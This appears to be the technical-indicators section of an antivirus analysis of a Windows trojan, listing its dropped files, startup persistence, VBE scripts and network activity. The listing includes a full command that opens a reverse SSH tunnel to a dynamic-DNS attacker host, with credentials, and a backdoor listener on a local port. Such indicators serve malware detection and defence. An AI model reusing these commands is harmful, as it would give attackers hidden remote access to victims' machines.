Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\DiskDoctor.lnk
- C:\Data.Msi\System.exe -ssh -R 51962:127.0.0.1:2103 -N adminhttp.zapto.org -l httpd -pw muiema123qwe
- C:\Data.Msi\cssrs.exe -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
- <SYSTEM32>\wscript.exe "C:\Data.Msi\alg.vbe"
- <SYSTEM32>\wscript.exe "C:\Data.Msi\startup.vbe"
- %PROGRAM_FILES%\Photobucket\Photobucket Album\Uninstall.exe
- C:\Data.Msi\System.exe
- C:\Data.Msi\startup.vbe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\POLARISEFI4X4[1]
- <LS_APPDATA>\PUTTY.RND
- %PROGRAM_FILES%\Photobucket\Photobucket Album\Uninstall.ini
- C:\Data.Msi\alg.vbe
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- C:\Data.Msi\pic.url
- C:\Data.Msi\DiskDoctor.lnk
- C:\Data.Msi\cssrs.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 's7##.##otobucket.com':80
- 'ad####ttp.zapto.org':22
- 'localhost':1036
- s7##.##otobucket.com/albums/xx154/POLARISEFI4X4/?al#################
- DNS ASK s7##.##otobucket.com
- DNS ASK ad####ttp.zapto.org
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''